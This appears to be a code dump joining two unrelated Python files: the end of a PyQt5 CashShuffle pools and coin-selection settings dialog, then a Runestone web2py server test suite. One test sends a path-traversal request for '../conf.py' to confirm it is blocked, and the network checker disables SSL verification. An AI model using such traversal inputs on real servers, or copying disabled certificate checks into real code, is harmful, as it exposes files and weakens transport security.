# (and no other references referencing the object!).
if 'C++' in str(e):
self.print_error("Underlying C/C++ object deleted. Working around PyQt5 bugs and ignoring...")
else:
raise
super().closeEvent(e)
e.accept()
def hideEvent(self, e):
super().hideEvent(e)
if e.isAccepted():
#self.print_error("Hide")
try: PoolsWinMgr.instance().simpleChangedSig.disconnect(self._simpleChangedSlot)
except TypeError: pass # Not connected.
self.stopNetworkChecker()
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
#self.print_error("Show")
PoolsWinMgr.instance().simpleChangedSig.connect(self._simpleChangedSlot)
self.refresh(self.sdict)
self.startNetworkChecker()
# do stuff related to refreshing, etc here...
def _isSimple(self):
return bool(self.config.get(ConfKeys.Global.VIEW_POOLS_SIMPLE, True))
def _setSimple(self, b):
b = bool(b)
if b != self._isSimple():
self.config.set_key(ConfKeys.Global.VIEW_POOLS_SIMPLE, b)
self.needsColumnSizing = True
PoolsWinMgr.instance().simpleChangedSig.emit()
def _simpleChangedSlot(self):
self.refresh(self.sdict)
def refresh(self, sdict):
# NB: sdict may be non-empty (has actual results) but still contain no
# pools if server has no pools. It's only empty before we get a response
# from stats port.
if not sdict:
return
if self.sdict is not sdict:
self.sdict = sdict.copy()
simple = self._isSimple()
self.simpleChk.setChecked(simple)
mysettings = BackgroundShufflingThread.latest_shuffle_settings
# handle if we detected a ban
if self.sdict.get('banned'):
banScore = self.sdict.get('banScore') or 0
self.banLabel.setText('<font color="#dd4444"><b>{}</b></font> (ban score: {})'.format(_("Banned"), banScore))
self.banLabel.setHidden(False)
else:
self.banLabel.setHidden(True)
pools = self.sdict.get('poolsList', list()).copy()
poolSize = str(self.sdict.get('poolSize', ''))
self.tree.clear()
try:
pools.sort(reverse=True, key=lambda x:(0 if x['full'] else 1, x['amount'], x['members'], -x.get('version',0)))
except (KeyError, ValueError, TypeError):
# hmm. Pools dict is missing or has bad keys. Assume bad input. Clear list and proceed with a 'no pools' message
pools = []
for c in range(2,4):
self.tree.setColumnHidden(c, simple)
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
for p in pools:
typ, version = p.get('type', mysettings.type_name), p.get('version', mysettings.version)
is_my_settings = typ == mysettings.type_name and version == mysettings.version
if not simple or is_my_settings:
twi = QTreeWidgetItem([
format_satoshis_plain(p['amount']) + " BCH",
"{} / {}".format(str(p['members']), poolSize),
str(p.get('type','?')).lower(),
str(p.get('version','?')),
"√" if p['full'] else '-',
])
if not is_my_settings:
grayify(twi)
self.tree.addTopLevelItem(twi)
tit = self.poolsGB.title().rsplit(' ', 1)[0]
self.poolsGB.setTitle(tit + " ({})".format(self.tree.topLevelItemCount()))
def sizeColumnsToFit():
for i in range(self.tree.columnCount()):
self.tree.resizeColumnToContents(i)
if not self.tree.topLevelItemCount():
twi = QTreeWidgetItem([_('No Pools'), '', '', '', ''])
f = twi.font(0); f.setItalic(True); twi.setFont(0, f)
self.tree.addTopLevelItem(twi)
self.tree.setFirstItemColumnSpanned(twi, True)
self.tree.setHeaderHidden(True)
sizeColumnsToFit() # in no pools mode we unconditionally size to fit
self.needsColumnSizing = True # once we enter this "No pools.." mode, we need to force resize columns next time we have real entries to avoid layout weirdness
else:
self.tree.setHeaderHidden(False)
if self.needsColumnSizing: # this flag suppresses resizing each refresh to allow users to manually size the columns after a display with real data appears.
sizeColumnsToFit()
self.needsColumnSizing = False
def _kick_off_nc(self):
try:
self.settingsChanged.emit(self.settings) # kicks off the NetworkChecker by sending it some server settings to check
except RuntimeError:
pass # paranoia: guard against wrapped C++ object exception.. shouldn't happen because timer was keyed off this object as receiver
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = nc = NetworkChecker(self)
nc.pollTimeSecs, nc.verifySSL, nc.checkShufflePort = 2.0, False, False
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(500, self._kick_off_nc) # despite appearances timer will not fire after object deletion due to PyQt5 singal/slot receiver rules
def stopNetworkChecker(self):
if self.networkChecker:
self.networkChecker.stop() # waits for network checker to finish...
self.networkChecker = None
self.print_error("Stopped network checker.")
# /PoolsWindow
class CoinSelectionSettingsWindow(AppModalDialog, PrintError):
''' The pop-up window to manage minimum/maximum coin amount settings.
Accessible from a link in the "CashShuffle Settings.." window or Network
Dialog tab. '''
def __init__(self, title=None):
super().__init__(title=title or _("CashShuffle - Coin Selection Settings"), parent=None)
vbox = QVBoxLayout(self)
lbl = QLabel(_("Specify minimum and maximum coin amounts to select for shuffling:"))
lbl.setWordWrap(True)
vbox.addWidget(lbl)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Minimum coin:"),
_("Coins (UTXOs) below this amount will not be selected for shuffling.")))
self.minEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.minEdit)
vbox.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Maximum coin:"),
_("Coins (UTXOs) up to this amount will be selected for shuffling.")))
self.maxEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.maxEdit)
vbox.addLayout(hbox)
self.maxEdit.textEdited.connect(self.clearErr)
self.minEdit.textEdited.connect(self.clearErr)
vbox.addStretch()
self.errLabel = QLabel("")
self.errLabel.setAlignment(Qt.AlignCenter)
vbox.addWidget(self.errLabel)
vbox.addStretch()
vbox.addLayout(Buttons(CancelButton(self),
EnterButton(_("Defaults"), self.default),
EnterButton(_("Apply"), self.apply),
))
self.resize(320,200)
self.fromConfig()
# DEBUG Qt destruction
destroyed_print_error(self)
def _decimal_point(self): return get_config().get('decimal_point', 8)
def _fmt_amt(self, amt): return format_satoshis_plain(amt, self._decimal_point())
def apply(self):
lower, upper = self.minEdit.get_amount(), self.maxEdit.get_amount()
if not lower or not upper or upper <= lower:
self.setErr(_("Invalid amount"))
return
hard_upper = BackgroundShufflingThread.hard_upper_bound()
if upper > hard_upper:
self.setErr(_("Upper limit is {}").format(self._fmt_amt(hard_upper)))
return
hard_lower = BackgroundShufflingThread.hard_lower_bound()
if lower < hard_lower:
self.setErr(_("Lower limit is {}").format(self._fmt_amt(hard_lower)))
return
if (lower, upper) != tuple(BackgroundShufflingThread.update_lower_and_upper_bound_from_config()):
pre = ''
if (lower, upper) == self._get_defaults():
BackgroundShufflingThread.reset_lower_and_upper_bound_to_defaults()
pre = _("Default values restored.\n\n")
else:
actual_lower, actual_upper = BackgroundShufflingThread.set_lower_and_upper_bound(lower, upper)
if (lower, upper) != (actual_lower, actual_upper):
pre = _("Actual amounts applied: {} and {}.\n\n").format(self._fmt_amt(actual_lower),
self._fmt_amt(actual_upper))
self.show_message(pre+_("Changes will take effect when the next shuffle round starts (usually within in a few minutes)."))
self.accept()
def fromConfig(self):
lower, upper = BackgroundShufflingThread.update_lower_and_upper_bound_from_config()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def _get_defaults(self): return BackgroundShufflingThread.DEFAULT_LOWER_BOUND, BackgroundShufflingThread.DEFAULT_UPPER_BOUND
def default(self):
lower, upper = self._get_defaults()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def setErr(self, txt='', noerr=False):
txt = txt or ""
if noerr:
try: color = ColorScheme.DEFAULT._get_color(0)
except AttributeError: color = "#666666"
else:
try: color = ColorScheme.RED._get_color(0)
except AttributeError: color = "red"
self.errLabel.setText('<font color="{}">{}</font>'.format(color, txt))
def clearErr(self): self.setErr('', noerr=True)
# /CoinSelectionSettingsWindow
|
test_server.py
|
# *****************************************
# |docname| - Tests using the web2py server
# *****************************************
# These tests start the web2py server then submit requests to it. All the fixtures are auto-imported by pytest from ``conftest.py``.
#
# .. contents::
#
# Imports
# =======
# These are listed in the order prescribed by `PEP 8
# <http://www.python.org/dev/peps/pep-0008/#imports>`_.
#
# Standard library
# ----------------
from textwrap import dedent
import json
from threading import Thread
import datetime
import re
import sys
import time
# Third-party imports
# -------------------
import pytest
import six
# Local imports
# -------------
from .utils import web2py_controller_import
# Debugging notes
# ===============
# Invoke the debugger.
##import pdb; pdb.set_trace()
# Put this in web2py code, then use the web-based debugger.
##from gluon.debug import dbg; dbg.set_trace()
# Tests
# =====
# Use for easy manual testing of the server, by setting up a user and class automatically. Comment out the line below to enable it.
@pytest.mark.skip(reason="Only needed for manual testing.")
def test_manual(runestone_db_tools, test_user):
# Modify this as desired to create courses, users, etc. for manual testing.
course_1 = runestone_db_tools.create_course()
test_user("bob", "bob", course_1)
# Pause in the debugger until manual testing is done.
import pdb
pdb.set_trace()
def test_killer(test_assignment, test_client, test_user_1, runestone_db_tools):
"""
This test ensures that we have the routing set up for testing properly.
This test will fail if routes.py is set up as follows.
routes_onerror = [
('runestone/static/404', '/runestone/static/fail.html'),
('runestone/500', '/runestone/default/reportabug.html'),
]
for testing purposes we don't want web2py to capture 500 errors.
"""
with pytest.raises(Exception) as excinfo:
test_client.post("admin/killer")
assert test_client.text == ""
print(excinfo.value)
assert "ticket" in str(excinfo.value) or "INTERNAL" in str(excinfo.value)
# Validate the HTML produced by various web2py pages.
# NOTE -- this is the start of a really really long decorator for test_1
@pytest.mark.parametrize(
"url, requires_login, expected_string, expected_errors",
[
# **Admin**
# ----------
# FIXME: Flashed messages don't seem to work.
# ('admin/index', False, 'You must be registered for a course to access this page', 1),
# ('admin/index', True, 'You must be an instructor to access this page', 1),
("admin/doc", True, "Runestone Help and Documentation", 1),
# **Assignments**
# ----------------
("assignments/chooseAssignment", True, "Assignments", 1),
("assignments/doAssignment", True, "Bad Assignment ID", 1),
# TODO: Why 2 errors here? Was just 1.
(
"assignments/practice",
True,
"Practice tool is not set up for this course yet.",
2,
),
("assignments/practiceNotStartedYet", True, "test_course_1", 2),
# **Default**
# ------------
# *User*
#
# The `authentication <http://web2py.com/books/default/chapter/29/09/access-control#Authentication>`_ section gives the URLs exposed by web2py. Check these.
("default/user/login", False, "Login", 1),
("default/user/register", False, "Registration", 1),
("default/user/logout", True, "Logged out", 1),
# One validation error is a result of removing the input field for the e-mail, but web2py still tries to label it, which is an error.
("default/user/profile", True, "Profile", 2),
("default/user/change_password", True, "Change password", 1),
# Runestone doesn't support this.
#'default/user/verify_email', False, 'Verify email', 1),
("default/user/retrieve_username", False, "Retrieve username", 1),
("default/user/request_reset_password", False, "Request reset password", 1),
# This doesn't display a webpage, but instead redirects to courses.
# ('default/user/reset_password, False, 'Reset password', 1),
("default/user/impersonate", True, "Impersonate", 1),
# FIXME: This produces an exception.
#'default/user/groups', True, 'Groups', 1),
("default/user/not_authorized", False, "Not authorized", 1),
# *Other pages*
#
# TODO: What is this for?
# ('default/call', False, 'Not found', 0),
("default/index", True, "Course Selection", 1),
("default/about", False, "About Us", 1),
("default/error", False, "Error: the document does not exist", 1),
("default/ack", False, "Acknowledgements", 1),
# web2py generates invalid labels for the radio buttons in this form.
("default/bio", True, "Tell Us About Yourself", 3),
("default/courses", True, "Course Selection", 1),
("default/remove", True, "Remove a Course", 1),
# Should work in both cases.
("default/reportabug", False, "Report a Bug", 1),
("default/reportabug", True, "Report a Bug", 1),
# ('default/sendreport', True, 'Could not create issue', 1),
("default/terms", False, "Terms and Conditions", 1),
("default/privacy", False, "Runestone Academy Privacy Policy", 1),
("default/donate", False, "Support Runestone Interactive", 1),
# TODO: This doesn't really test much of the body of either of these.
("default/coursechooser", True, "Course Selection", 1),
# If we choose an invalid course, then we go to the profile to allow the user to add that course. The second validation failure seems to be about the ``for`` attribute of the ```<label class="readonly" for="auth_user_email" id="auth_user_email__label">`` tag, since the id ``auth_user_email`` isn't defined elsewhere.
("default/coursechooser/xxx", True, "Course IDs for open courses", 2),
("default/removecourse", True, "Course Selection", 1),
("default/removecourse/xxx", True, "Course Selection", 1),
(
"dashboard/studentreport",
True,
"Recent Activity",
1,
),
# **Designer**
# -------------
(
"designer/index",
True,
"This page allows you to select a book for your own class.",
1,
),
("designer/build", True, "Build a Custom", 1),
# **OAuth**
# ----------
(
"oauth/index",
False,
"This page is a utility for accepting redirects from external services like Spotify or LinkedIn that use oauth.",
1,
),
("books/index", False, "Runestone Test Book", 1),
("books/published", False, "Runestone Test Book", 1),
# TODO: Many other views!
],
)
def test_validate_user_pages(
url, requires_login, expected_string, expected_errors, test_client, test_user_1
):
if requires_login:
test_user_1.login()
else:
test_client.logout()
test_client.validate(url, expected_string, expected_errors)
# Validate the HTML in instructor-only pages.
# NOTE -- this is the start of a really really long decorator for test_2
@pytest.mark.parametrize(
"url, expected_string, expected_errors",
[
# **Default**
# ------------
# web2py-generated stuff produces two extra errors.
("default/bios", "Bios", 3),
# FIXME: The element ``<form id="editIndexRST" action="">`` in ``views/admin/admin.html`` produces the error ``Bad value \u201c\u201d for attribute \u201caction\u201d on element \u201cform\u201d: Must be non-empty.``.
#
# **Admin**
# ----------
("admin/admin", "Course Settings", 1),
("admin/course_students", '"test_user_1"', 2),
("admin/createAssignment", "ERROR", None),
("admin/grading", "assignment", 1),
# TODO: This produces an exception.
# ('admin/practice', 'Choose when students should start their practice.', 1),
# TODO: This deletes the course, making the test framework raise an exception. Need a separate case to catch this.
# ('admin/deletecourse', 'Manage Section', 2),
# FIXME: these raise an exception.
# ('admin/addinstructor', 'Trying to add non-user', 1), -- this is an api call
# ('admin/add_practice_items', 'xxx', 1), -- this is an api call
("admin/assignments", "Assignment", 5), # labels for hidden elements
# ('admin/backup', 'xxx', 1),
("admin/practice", "Choose when students should start", 1),
# ('admin/removeassign', 'Cannot remove assignment with id of', 1),
# ('admin/removeinstructor', 'xxx', 1),
# ('admin/removeStudents', 'xxx', 1),
("admin/get_assignment", "Error: assignment ID", 1),
("admin/get_assignment?assignmentid=junk", "Error: assignment ID", 1),
("admin/get_assignment?assignmentid=100", "Error: assignment ID", 1),
# TODO: added to the ``createAssignment`` endpoint so far.
# **Dashboard**
# --------------
("dashboard/index", "Instructor Dashboard", 1),
("dashboard/grades", "Gradebook", 1),
# TODO: This doesn't really test anything about either
# exercisemetrics or questiongrades other than properly handling a call with no information
("dashboard/exercisemetrics", "Instructor Dashboard", 1),
("dashboard/questiongrades", "Instructor Dashboard", 1),
],
)
def test_validate_instructor_pages(
url, expected_string, expected_errors, test_client, test_user, test_user_1
):
test_instructor_1 = test_user("test_instructor_1", "password_1", test_user_1.course)
test_instructor_1.make_instructor()
# Make sure that non-instructors are redirected.
test_client.logout()
test_client.validate(url, "Login")
test_user_1.login()
test_client.validate(url, "Insufficient privileges")
test_client.logout()
# Test the instructor results.
test_instructor_1.login()
test_client.validate(url, expected_string, expected_errors)
# Test the ``ajax/preview_question`` endpoint.
def test_preview_question(test_client, test_user_1):
preview_question = "ajax/preview_question"
# Passing no parameters should raise an error.
test_client.validate(preview_question, "Error: ")
# Passing something not JSON-encoded should raise an error.
test_client.validate(preview_question, "Error: ", data={"code": "xxx"})
# Passing invalid RST should produce a Sphinx warning.
test_client.validate(preview_question, "WARNING", data={"code": '"*hi"'})
# Passing valid RST with no Runestone component should produce an error.
test_client.validate(preview_question, "Error: ", data={"code": '"*hi*"'})
# Passing a string with Unicode should work. Note that 0x0263 == 611; the JSON-encoded result will use this.
test_client.validate(
preview_question,
"ɣ",
data={
"code": json.dumps(
dedent(
"""\
.. fillintheblank:: question_1
Mary had a \u0263.
- :x: Whatever.
"""
)
)
},
)
# Verify that ``question_1`` is not in the database. TODO: This passes even if the ``DBURL`` env variable in ``ajax.py`` fucntion ``preview_question`` isn't deleted. So, this test doesn't work.
db = test_user_1.runestone_db_tools.db
assert len(db(db.fitb_answers.div_id == "question_1").select()) == 0
# TODO: Add a test case for when the runestone build produces a non-zero return code.
# Test the ``default/user/profile`` endpoint.
def test_user_profile(test_client, test_user_1):
test_user_1.login()
runestone_db_tools = test_user_1.runestone_db_tools
course_name = "test_course_2"
test_course_2 = runestone_db_tools.create_course(course_name)
# Test a non-existant course.
test_user_1.update_profile(
expected_string="Errors in form", course_name="does_not_exist"
)
# Test an invalid e-mail address. TODO: This doesn't produce an error message.
##test_user_1.update_profile(expected_string='Errors in form',
## email='not a valid e-mail address')
# Change the user's profile data; add a new course.
username = "a_different_username"
first_name = "a different first"
last_name = "a different last"
email = "a_different_email@foo.com"
test_user_1.update_profile(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
course_name=course_name,
accept_tcp="",
is_free=True,
)
# Check the values.
db = runestone_db_tools.db
user = db(db.auth_user.id == test_user_1.user_id).select().first()
# The username shouldn't be changable.
assert user.username == test_user_1.username
assert user.first_name == first_name
assert user.last_name == last_name
# TODO: The e-mail address isn't updated.
# assert user.email == email
assert user.course_id == test_course_2.course_id
assert user.accept_tcp == False # noqa: E712
# TODO: I'm not sure where the section is stored.
# assert user.section == section
# Test that the course name is correctly preserved across registrations if other fields are invalid.
def test_registration(test_client, runestone_db_tools):
# Registration doesn't work unless we're logged out.
test_client.logout()
course_name = "a_course_name"
runestone_db_tools.create_course(course_name)
# Now, post the registration.
username = "username"
first_name = "first"
last_name = "last"
email = "e@mail.com"
password = "password"
test_client.validate(
"default/user/register",
"Please fix the following errors in your registration",
data=dict(
username=username,
first_name=first_name,
last_name=last_name,
# The e-mail address must be unique.
email=email,
password=password,
password_two=password + "oops",
# Note that ``course_id`` is (on the form) actually a course name.
course_id=course_name,
accept_tcp="on",
donate="0",
_next="/runestone/default/index",
_formname="register",
),
)
# Check that the pricing system works correctly.
def test_pricing(runestone_db_tools, runestone_env):
# Check the pricing.
default_controller = web2py_controller_import(runestone_env, "default")
db = runestone_db_tools.db
base_course = runestone_db_tools.create_course()
child_course = runestone_db_tools.create_course(
"test_child_course", base_course=base_course.course_name
)
# First, test on a base course.
for expected_price, actual_price in [(0, None), (0, -100), (0, 0), (15, 15)]:
db(db.courses.id == base_course.course_id).update(student_price=actual_price)
assert default_controller._course_price(base_course.course_id) == expected_price
# Test in a child course as well. Create a matrix of all base course prices by all child course prices.
for expected_price, actual_base_price, actual_child_price in [
(0, None, None),
(0, None, 0),
(0, None, -1),
(2, None, 2),
(0, 0, None),
(0, 0, 0),
(0, 0, -1),
(2, 0, 2),
(0, -2, None),
(0, -2, 0),
(0, -2, -1),
(2, -2, 2),
(3, 3, None),
(0, 3, 0),
(0, 3, -1),
(2, 3, 2),
]:
db(db.courses.id == base_course.course_id).update(
student_price=actual_base_price
)
db(db.courses.id == child_course.course_id).update(
student_price=actual_child_price
)
assert (
default_controller._course_price(child_course.course_id) == expected_price
)
# Check that setting the price causes redirects to the correct location (payment vs. donation) when registering for a course or adding a new course.
def test_price_free(runestone_db_tools, test_user):
db = runestone_db_tools.db
course_1 = runestone_db_tools.create_course(student_price=0)
course_2 = runestone_db_tools.create_course("test_course_2", student_price=0)
# Check registering for a free course.
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=True)
# Verify the user was added to the ``user_courses`` table.
assert (
db(
(db.user_courses.course_id == test_user_1.course.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Check adding a free course.
test_user_1.update_profile(course_name=course_2.course_name, is_free=True)
# Same as above.
assert (
db(
(db.user_courses.course_id == course_2.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
def test_price_paid(runestone_db_tools, test_user):
db = runestone_db_tools.db
# Check registering for a paid course.
course_1 = runestone_db_tools.create_course(student_price=1)
course_2 = runestone_db_tools.create_course("test_course_2", student_price=1)
# Check registering for a paid course.
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=False)
# Until payment is provided, the user shouldn't be added to the ``user_courses`` table. Ensure that refresh, login/logout, profile changes, adding another class, etc. don't allow access.
test_user_1.test_client.logout()
test_user_1.login()
test_user_1.test_client.validate("default/index")
# Check adding a paid course.
test_user_1.update_profile(course_name=course_2.course_name, is_free=False)
# Verify no access without payment.
assert (
not db(
(db.user_courses.course_id == course_1.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
assert (
not db(
(db.user_courses.course_id == course_2.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Check that payments are handled correctly.
def test_payments(runestone_controller, runestone_db_tools, test_user):
if not runestone_controller.settings.STRIPE_SECRET_KEY:
pytest.skip("No Stripe keys provided.")
db = runestone_db_tools.db
course_1 = runestone_db_tools.create_course(student_price=100)
test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=False)
def did_payment():
return (
db(
(db.user_courses.course_id == course_1.course_id)
& (db.user_courses.user_id == test_user_1.user_id)
)
.select()
.first()
)
# Test some failing tokens.
assert not did_payment()
for token in ["tok_chargeCustomerFail", "tok_chargeDeclined"]:
test_user_1.make_payment(token)
assert not did_payment()
test_user_1.make_payment("tok_visa")
assert did_payment()
# Check that the payment record is correct.
payment = (
db(
(db.user_courses.user_id == test_user_1.user_id)
& (db.user_courses.course_id == course_1.course_id)
& (db.user_courses.id == db.payments.user_courses_id)
)
.select(db.payments.charge_id)
.first()
)
assert payment.charge_id
# Test the LP endpoint.
@pytest.mark.skipif(six.PY2, reason="Requires Python 3.")
def test_lp(test_user_1):
test_user_1.login()
# Check that omitting parameters produces an error.
ret = test_user_1.hsblog(event="lp_build")
assert "No feedback provided" in ret["errors"][0]
# Check that database entries are validated.
ret = test_user_1.hsblog(
event="lp_build",
# This div_id is too long. Everything else is OK.
div_id="X" * 1000,
course=test_user_1.course.course_name,
builder="unsafe-python",
answer=json.dumps({"code_snippets": ["def one(): return 1"]}),
)
assert "div_id" in ret["errors"][0]
# Check a passing case
def assert_passing():
ret = test_user_1.hsblog(
event="lp_build",
div_id="lp_demo_1",
course=test_user_1.course.course_name,
builder="unsafe-python",
answer=json.dumps({"code_snippets": ["def one(): return 1"]}),
)
assert "errors" not in ret
assert ret["correct"] == 100
assert_passing()
# Send lots of jobs to test out the queue. Skip this for now -- not all the useinfo entries get deleted, which causes ``test_getNumOnline`` to fail.
if False:
threads = [Thread(target=assert_passing) for x in range(5)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Test dynamic book routing.
def test_dynamic_book_routing_1(test_client, test_user_1):
test_user_1.login()
dbr_tester(test_client, test_user_1, True)
# Test that a draft is accessible only to instructors.
test_user_1.make_instructor()
test_user_1.update_profile(course_name=test_user_1.course.course_name)
test_client.validate(
"books/draft/{}/index.html".format(test_user_1.course.base_course),
"The red car drove away.",
)
# Test the no-login case.
def test_dynamic_book_routing_2(test_client, test_user_1):
test_client.logout()
# Test for a book that doesn't require a login. First, change the book to not require a login.
db = test_user_1.runestone_db_tools.db
db(db.courses.course_name == test_user_1.course.base_course).update(
login_required=False
)
db.commit()
dbr_tester(test_client, test_user_1, False)
def dbr_tester(test_client, test_user_1, is_logged_in):
# Test error cases.
validate = test_client.validate
base_course = test_user_1.course.base_course
# A non-existant course.
if is_logged_in:
validate("books/published/xxx", "Course Selection")
else:
validate("books/published/xxx", expected_status=404)
# A non-existant page.
validate("books/published/{}/xxx".format(base_course), expected_status=404)
# A directory.
validate(
"books/published/{}/test_chapter_1".format(base_course), expected_status=404
)
# Attempt to access files outside a course.
validate("books/published/{}/../conf.py".format(base_course), expected_status=404)
# Attempt to access a course we're not registered for. TODO: Need to create another base course for this to work.
##if is_logged_in:
## #validate('books/published/{}/index.html'.format(base_course), [
## 'Sorry you are not registered for this course.'
## ])
# A valid page. Check the book config as well.
validate(
"books/published/{}/index.html".format(base_course),
[
"The red car drove away.",
"eBookConfig.course = '{}';".format(
test_user_1.course.course_name if is_logged_in else base_course
),
"eBookConfig.basecourse = '{}';".format(base_course),
],
)
# Drafts shouldn't be accessible by students.
validate(
"books/draft/{}/index.html".format(base_course),
"Insufficient privileges" if is_logged_in else "Username",
)
# Check routing in a base course.
if is_logged_in:
test_user_1.update_profile(
course_name=test_user_1.course.base_course, is_free=True
)
validate(
"books/published/{}/index.html".format(base_course),
[
"The red car drove away.",
"eBookConfig.course = '{}';".format(base_course),
"eBookConfig.basecourse = '{}';".format(base_course),
],
)
# Test static content.
validate(
"books/published/{}/_static/runestone-custom-sphinx-bootstrap.css".format(
base_course
),
"background-color: #fafafa;",
)
def test_assignments(test_client, runestone_db_tools, test_user):
course_3 = runestone_db_tools.create_course("test_course_3")
test_instructor_1 = test_user("test_instructor_1", "password_1", course_3)
test_instructor_1.make_instructor()
test_instructor_1.login()
db = runestone_db_tools.db
name_1 = "test_assignment_1"
name_2 = "test_assignment_2"
name_3 = "test_assignment_3"
# Create an assignment -- using createAssignment
test_client.post("admin/createAssignment", data=dict(name=name_1))
assign1 = (
db(
(db.assignments.name == name_1)
& (db.assignments.course == test_instructor_1.course.course_id)
)
.select()
.first()
)
assert assign1
# Make sure you can't create two assignments with the same name
test_client.post("admin/createAssignment", data=dict(name=name_1))
assert "EXISTS" in test_client.text
# Rename assignment
test_client.post("admin/createAssignment", data=dict(name=name_2))
assign2 = (
db(
(db.assignments.name == name_2)
& (db.assignments.course == test_instructor_1.course.course_id)
)
.select()
.first()
)
assert assign2
test_client.post(
"admin/renameAssignment", data=dict(name=name_3, original=assign2.id)
)
assert db(db.assignments.name == name_3).select().first()
assert not db(db.assignments.name == name_2).select().first()
# Make sure you can't rename an assignment to an already used assignment
test_client.post(
"admin/renameAssignment", data=dict(name=name_3, original=assign1.id)
)
assert "EXISTS" in test_client.text
# Delete an assignment -- using removeassignment
test_client.post("admin/removeassign", data=dict(assignid=assign1.id))
assert not db(db.assignments.name == name_1).select().first()
test_client.post("admin/removeassign", data=dict(assignid=assign2.id))
assert not db(db.assignments.name == name_3).select().first()
test_client.post("admin/removeassign", data=dict(assignid=9999999))
assert "Error" in test_client.text
def test_instructor_practice_admin(test_client, runestone_db_tools, test_user):
course_4 = runestone_db_tools.create_course("test_course_1")
test_student_1 = test_user("test_student_1", "password_1", course_4)
test_student_1.logout()
test_instructor_1 = test_user("test_instructor_1", "password_1", course_4)
test_instructor_1.make_instructor()
test_instructor_1.login()
db = runestone_db_tools.db
course_start_date = datetime.datetime.strptime(
course_4.term_start_date, "%Y-%m-%d"
).date()
start_date = course_start_date + datetime.timedelta(days=13)
end_date = datetime.datetime.today().date() + datetime.timedelta(days=30)
max_practice_days = 40
max_practice_questions = 400
day_points = 1
question_points = 0.2
questions_to_complete_day = 5
graded = 0
# Test the practice tool settings for the course.
flashcard_creation_method = 2
test_client.post(
"admin/practice",
data={
"StartDate": start_date,
"EndDate": end_date,
"graded": graded,
"maxPracticeDays": max_practice_days,
"maxPracticeQuestions": max_practice_questions,
"pointsPerDay": day_points,
"pointsPerQuestion": question_points,
"questionsPerDay": questions_to_complete_day,
"flashcardsCreationType": 2,
"question_points": question_points,
},
)
practice_settings_1 = (
db(
(db.course_practice.auth_user_id == test_instructor_1.user_id)
& (db.course_practice.course_name == course_4.course_name)
& (db.course_practice.start_date == start_date)
& (db.course_practice.end_date == end_date)
& (
db.course_practice.flashcard_creation_method
== flashcard_creation_method
)
& (db.course_practice.graded == graded)
)
.select()
.first()
)
assert practice_settings_1
if practice_settings_1.spacing == 1:
assert practice_settings_1.max_practice_days == max_practice_days
assert practice_settings_1.day_points == day_points
assert (
practice_settings_1.questions_to_complete_day == questions_to_complete_day
)
else:
assert practice_settings_1.max_practice_questions == max_practice_questions
assert practice_settings_1.question_points == question_points
# Test instructor adding a subchapter to the practice tool for students.
# I need to call set_tz_offset to set timezoneoffset in the session.
test_client.post("ajax/set_tz_offset", data={"timezoneoffset": 0})
# The reason I'm manually stringifying the list value is that test_client.post does something strange with compound objects instead of passing them to json.dumps.
test_client.post(
"admin/add_practice_items",
data={"data": '["1. Test chapter 1/1.2 Subchapter B"]'},
)
practice_settings_1 = (
db(
(db.user_topic_practice.user_id == test_student_1.user_id)
& (db.user_topic_practice.course_name == course_4.course_name)
& (db.user_topic_practice.chapter_label == "test_chapter_1")
& (db.user_topic_practice.sub_chapter_label == "subchapter_b")
)
.select()
.first()
)
assert practice_settings_1
def test_deleteaccount(test_client, runestone_db_tools, test_user):
course_3 = runestone_db_tools.create_course("test_course_3")
the_user = test_user("user_to_delete", "password_1", course_3)
the_user.login()
validate = the_user.test_client.validate
the_user.hsblog(
event="mChoice",
act="answer:1:correct",
answer="1",
correct="T",
div_id="subc_b_1",
course="test_course_3",
)
validate("default/delete", "About Runestone", data=dict(deleteaccount="checked"))
db = runestone_db_tools.db
res = db(db.auth_user.username == "user_to_delete").select().first()
print(res)
time.sleep(2)
assert not db(db.useinfo.sid == "user_to_delete").select().first()
assert not db(db.code.sid == "user_to_delete").select().first()
for t in [
"clickablearea",
"codelens",
"dragndrop",
"fitb",
"lp",
"mchoice",
"parsons",
"shortanswer",
]:
assert (
not db(db["{}_answers".format(t)].sid == "user_to_delete").select().first()
)
# Test the grades report.
# When this test fails it is very very difficult to figure out why.
# The data structures being compared are very large which makes it very very
# difficult to pin down what is failing. In addition it seems there is a dictionary
# in here somewhere where the order of things shifts around. I think it is currenly
# broken because more components now return a percent correct value.
@pytest.mark.skip(reason="TODO: This test is unpredictable and needs to be updated.")
def test_grades_1(runestone_db_tools, test_user, tmp_path):
# Create test users.
course = runestone_db_tools.create_course()
course_name = course.course_name
# **Create test data**
# ======================
# Create test users.
test_user_array = [
test_user(
"test_user_{}".format(index), "x", course, last_name="user_{}".format(index)
)
for index in range(4)
]
def assert_passing(index, *args, **kwargs):
res = test_user_array[index].hsblog(*args, **kwargs)
assert "errors" not in res
# Prepare common arguments for each question type.
shortanswer_kwargs = dict(
event="shortanswer", div_id="test_short_answer_1", course=course_name
)
fitb_kwargs = dict(event="fillb", div_id="test_fitb_1", course=course_name)
mchoice_kwargs = dict(event="mChoice", div_id="test_mchoice_1", course=course_name)
lp_kwargs = dict(
event="lp_build",
div_id="lp_demo_1",
course=course_name,
builder="unsafe-python",
)
